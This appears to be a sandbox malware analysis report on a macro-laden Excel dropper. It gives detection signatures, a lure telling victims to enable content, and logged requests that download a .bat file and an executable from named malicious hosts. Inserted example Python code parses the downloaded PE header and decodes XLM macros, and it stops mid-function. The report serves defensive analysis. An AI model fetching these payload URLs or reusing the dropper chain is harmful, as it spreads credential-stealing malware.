Analysis Report ul9kpUwYel.xls

Overview

General Information

Sample Name: ul9kpUwYel.xls
Analysis ID: 337274
MD5: c2ca4d5f2632597023b6cf5b496fb4ed
SHA1: 076f6120eb80059c41e8d731d59471a2e9d81ad8
SHA256: 1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell downloading file from url shortener site
Contains functionality to steal Internet Explorer form passwords
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Obfuscated Powershell
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://chebo.discountmonumentcenter.com/vantuz_2021.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: trashbininspector.fun Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe ReversingLabs: Detection: 72%
Multi AV Scanner detection for submitted file
Source: ul9kpUwYel.xls Virustotal: Detection: 41%
Source: ul9kpUwYel.xls Metadefender: Detection: 22%
Source: ul9kpUwYel.xls ReversingLabs: Detection: 34%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040B831 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0040B831
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00409D52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, 24_2_00409D52
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041A507 __EH_prolog,_strlen,CryptStringToBinaryA, 24_2_0041A507
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040A753 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0040A753
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040908B __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey, 24_2_0040908B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004233DC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 24_2_004233DC
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004235AF lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 24_2_004235AF
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040964F __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, 24_2_0040964F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004339BC lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA, 24_2_004339BC
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0029362C CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 24_2_0029362C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0028A757 __EH_prolog,_strlen,CryptStringToBinaryA, 24_2_0028A757
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002937FF CredEnumerateW,CryptUnprotectData,LocalFree,AuditFree, 24_2_002937FF
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027989F __EH_prolog,wsprintfA,CryptUnprotectData, 24_2_0027989F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027A9A3 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0027A9A3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027BA81 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0027BA81
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002A3C0C lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlen, 24_2_002A3C0C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00279FA2 __EH_prolog,wsprintfA,_wcsstr,CryptUnprotectData,LocalFree, 24_2_00279FA2

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCD2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045F42D FindFirstFileExW, 24_2_0045F42D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCF2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_0043DE3D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_002AE08D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CF67D FindFirstFileExW, 24_2_002CF67D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF22
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF42
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA, 24_2_00434AFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Jan 2021 08:06:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 04 Jan 2021 21:24:49 GMTAccept-Ranges: bytesContent-Length: 565248Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 d5 65 2a f6 b4 0b 79 f6 b4 0b 79 f6 b4 0b 79 e8 e6 8f 79 ed b4 0b 79 e8 e6 9e 79 ee b4 0b 79 e8 e6 88 79 97 b4 0b 79 d1 72 70 79 fd b4 0b 79 f6 b4 0a 79 93 b4 0b 79 e8 e6 81 79 f7 b4 0b 79 e8 e6 9f 79 f7 b4 0b 79 e8 e6 9a 79 f7 b4 0b 79 52 69 63 68 f6 b4 0b 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 b8 18 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 08 00 00 80 00 00 00 c0 37 04 b0 36 3f 04 00 d0 37 04 00 00 40 04 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 40 04 00 10 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 71 40 04 60 01 00 00 00 00 40 04 04 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 38 3f 04 18 00 00 00 88 f6 3f 04 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 c0 37 04 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 08 00 00 d0 37 04 00 28 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 
2e 72 73 72 63 00 00 00 00 80 00 00 00 00 40 04 00 74 00 00 00 2c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
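The response above carries a complete DOS/PE header, so the section layout of the downloaded file can be read straight from the dump. What follows is an added example and not part of the Joe Sandbox report: a PE32 header parser using only the Python standard library, fed with the header bytes transcribed from the Data Raw field. The DOS stub and Rich header between offset 0x40 and the PE signature at 0xe8 are replaced by zero padding because the parse does not depend on them (that padding is an assumption, not the original bytes), and the file size used for the overlay check is the Content-Length of the response (565248). The parser lists the three sections, UPX0, UPX1 and .rsrc, which is the layout UPX produces, and flags what an analyst would note before detonation: non-standard section names, sections that are both writable and executable, an entry point inside the packer section, and a UPX0 made of 0x437c000 bytes of uninitialised data, so the image grows to 0x4408000 bytes (about 68 MiB) in memory from a 565248-byte download.

```python
"""Added example: walk the PE headers of the executable returned by the
/vantuz_2021.exe download and flag the section-layout anomalies an analyst
checks before detonation (packer section names, writable+executable
sections, a virtual footprint far larger than the bytes on disk)."""
import struct

# Bytes transcribed from the "Data Raw" dump of the HTTP 200 response in the
# report: DOS header, then everything from the PE signature through the three
# section headers. The DOS stub and Rich header between 0x40 and 0xe8 are not
# needed by the parser and are replaced with zero padding (an assumption, not
# the original bytes).
_DOS_HEADER = ("4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 "
               "b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 "
               + "00 " * 28 +
               "e8 00 00 00")                                   # e_lfanew = 0xe8
_PE_HEADERS = (
    "50 45 00 00 "                                              # "PE\0\0"
    "4c 01 03 00 17 b8 18 5e 00 00 00 00 00 00 00 00 e0 00 03 01 "  # COFF header
    # optional header (PE32, 0xe0 bytes)
    "0b 01 09 00 00 30 08 00 00 80 00 00 00 c0 37 04 b0 36 3f 04 00 d0 37 04 "
    "00 00 40 04 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 "
    "05 00 00 00 00 00 00 00 00 80 40 04 00 10 00 00 00 00 00 00 02 00 00 80 "
    "00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 "
    # 16 data directories: export, import, resource, 6 empty, TLS, load config, 5 empty
    "00 00 00 00 00 00 00 00 04 71 40 04 60 01 00 00 00 00 40 04 04 71 00 00 "
    + "00 " * 48 +
    "54 38 3f 04 18 00 00 00 88 f6 3f 04 48 00 00 00 "
    + "00 " * 40 +
    # section table: UPX0, UPX1, .rsrc (40 bytes each)
    "55 50 58 30 00 00 00 00 00 c0 37 04 00 10 00 00 00 00 00 00 00 04 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 "
    "55 50 58 31 00 00 00 00 00 30 08 00 00 d0 37 04 00 28 08 00 00 04 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 "
    "2e 72 73 72 63 00 00 00 00 80 00 00 00 00 40 04 00 74 00 00 00 2c 08 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0"
)
SAMPLE_PE = bytes.fromhex(_DOS_HEADER) + b"\x00" * (0xE8 - 0x40) + bytes.fromhex(_PE_HEADERS)
SAMPLE_FILE_SIZE = 565248          # Content-Length of the response in the report

PE32_MAGIC = 0x10B
SCN_CNT_UNINITIALIZED_DATA = 0x00000080
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_WRITE = 0x80000000
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc",
                        ".idata", ".edata", ".pdata", ".tls", ".bss", ".CRT"}


def parse_pe(data):
    """Return header fields and the section table of a PE32 image
    (PE32+ is rejected; the dump above is a 32-bit binary)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("only PE32 is handled here")
    entry_point = struct.unpack_from("<I", data, opt + 0x10)[0]
    image_base = struct.unpack_from("<I", data, opt + 0x1C)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 0x38)[0]
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "raw_size": raw_size,
                         "raw_ptr": raw_ptr, "chars": chars})
    return {"machine": machine, "timestamp": timestamp, "entry_point": entry_point,
            "image_base": image_base, "size_of_image": size_of_image, "sections": sections}


def triage(pe, file_size):
    """Section-level indicators; each string is one finding."""
    findings = []
    names = [s["name"] for s in pe["sections"]]
    if names[:2] == ["UPX0", "UPX1"]:
        findings.append("UPX section layout (UPX0/UPX1)")
    for s in pe["sections"]:
        if s["name"] not in COMMON_SECTION_NAMES:
            findings.append(f"non-standard section name {s['name']!r}")
        if s["chars"] & SCN_MEM_EXECUTE and s["chars"] & SCN_MEM_WRITE:
            findings.append(f"{s['name']} is writable and executable")
        if s["chars"] & SCN_CNT_UNINITIALIZED_DATA and s["vsize"] > 8 * file_size:
            findings.append(f"{s['name']} expands to {s['vsize'] // 2**20} MiB from a {file_size}-byte file")
        if s["va"] <= pe["entry_point"] < s["va"] + s["vsize"]:
            findings.append(f"entry point 0x{pe['entry_point']:x} is in {s['name']}")
    end_of_data = max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])
    if end_of_data != file_size:
        findings.append(f"section data ends at {end_of_data}, file is {file_size} bytes (overlay or truncation)")
    return findings


if __name__ == "__main__":
    pe = parse_pe(SAMPLE_PE)
    for s in pe["sections"]:
        print(f"{s['name']:<8} va=0x{s['va']:08x} vsize=0x{s['vsize']:08x} "
              f"raw=0x{s['raw_size']:06x}@0x{s['raw_ptr']:06x} chars=0x{s['chars']:08x}")
    for finding in triage(pe, SAMPLE_FILE_SIZE):
        print("-", finding)
```

The 8x-file-size threshold for the uninitialised-data check and the list of common section names are this example's choices, not values taken from the report; on this sample the last section ends exactly at byte 565248, so there is no overlay.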
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1 (Host: 37.46.150.139, Connection: Keep-Alive; no User-Agent header)
Source: global traffic HTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1 (Host: chebo.discountmonumentcenter.com, Connection: Keep-Alive; no User-Agent header)
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.225.248
Source: Joe Sandbox View IP Address: 37.46.150.139
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139 (5 connections)
Source: unknown DNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004254E5 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 24_2_004254E5

E-Banking Fraud:

Drops certificate files (DER)
Source: C:\Users\user\AppData\Roaming\cr.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

System Summary:

Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
Source: Screenshot number: 4 Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
Source: Screenshot number: 8 Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
Source: Screenshot number: 8 Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
Source: Screenshot number: 12 Screenshot OCR: document is protected. 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work for
Source: Screenshot number: 12 Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
Source: Document image extraction number: 0 Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
Source: Document image extraction number: 0 Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" on the yellow bar above.
Source: Document image extraction number: 1 Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
Source: Document image extraction number: 1 Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" on the yellow bar above.
Found Excel 4.0 Macro with suspicious formulas
Source: ul9kpUwYel.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: ul9kpUwYel.xls Initial sample: High usage of CHAR() function: 21
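The two XLM findings above (an EXEC call and 21 CHAR() calls) describe the usual pattern: the command string is assembled from CHAR() calls and short literals in one cell and executed by EXEC() from another, so neither the keyword nor the command is visible in any single formula. The macro cells themselves are not reproduced in the report, so the sheet below is constructed; only the command string is real (it is the cmd.exe command line the sandbox recorded). The code is an added example, not part of the report or of any Joe Sandbox tooling, and works on formulas already extracted from the workbook (extraction with a tool such as oletools' olevba is an assumption about the reader's toolchain).

```python
"""Added example: static triage of an Excel 4.0 (XLM) macro sheet. It decodes
CHAR()-built strings, follows references from EXEC() back to the cells that
hold the command, and counts the two indicators the report's XLM signatures
are built on (an EXEC call and heavy CHAR() use)."""
import re

CHAR_RE = re.compile(r"CHAR\((\d{1,3})\)", re.IGNORECASE)
STR_LIT = r'"((?:[^"]|"")*)"'                      # Excel string literal; "" is an escaped quote
MERGE_RE = re.compile(STR_LIT + r"\s*&\s*" + STR_LIT)
LITERAL_CELL_RE = re.compile(r"^=" + STR_LIT + r"$")
# A1-style reference; references that happen to sit inside a string literal are not skipped.
REF_RE = re.compile(r"(?<![A-Z0-9_])\$?([A-Z]{1,3})\$?(\d+)(?![A-Z0-9_(])")
SUSPICIOUS_FUNCS = ("EXEC", "CALL", "REGISTER", "FORMULA", "RUN")


def deobfuscate(formula):
    """Turn CHAR(110)&CHAR(111) style formulas into plain string literals."""
    def char_to_literal(m):
        c = chr(int(m.group(1)))
        return '"' + ('""' if c == '"' else c) + '"'
    s = CHAR_RE.sub(char_to_literal, formula)
    while True:                                    # "a"&"b"&"c" -> "ab"&"c" -> "abc"
        merged = MERGE_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', s)
        if merged == s:
            return s
        s = merged


def resolve_refs(cells):
    """Inline references to cells that hold a plain string literal, so that
    EXEC(A1) shows the command it will run."""
    def inline(formula):
        def repl(m):
            target = cells.get(m.group(1) + m.group(2))
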